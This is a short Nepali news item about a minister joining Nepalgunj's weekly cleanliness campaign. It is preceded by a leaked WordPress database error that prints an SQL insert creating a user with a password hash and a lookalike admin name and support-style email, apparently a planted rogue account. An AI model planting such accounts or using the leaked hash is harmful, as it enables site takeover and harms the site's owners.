WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp/jHzAAVRUrpridD5ybpNTMlgri/b.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:05:56', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,माघ २८-
नेपालगन्जको सरसफाई अभियानमा आज स्थानीय विकासमन्त्री हितराज पाण्डेले सहभागिता जनाउनुभएको छ । नेपालगन्ज उपमहानगरपालिकाको सप्ताह व्यापी सरसफाई अभियान अन्तर्गत २५ औं हप्ताको सरसफाई अभियानमा मन्त्री पाण्डेले पुष्पलाल चोकदेखि कारकाँदो चोकसम्म आफै सहभागि भएर अभियानलाई सबैको साझा बनाउन आव्हान गर्नुभयो ।
नेपालगन्ज उपमहानगरपालिकाले प्रत्येक शनिवार नगरको सरसफाई गर्दै आएको छ । पहिलो चरणमा ३९ हप्तासम्म नगरको सरसफाई गरिएको थियो । उपमहानगरपालिकाको सरसफाई अभियानमा स्थानीयबासी, उद्योगी व्यवसायी, विद्यार्थीहरुको पनि सहभागिता बढ्दै गएको कार्यकारी प्रमुख गिरीराज ज्ञवालीले वताउनुभयो ।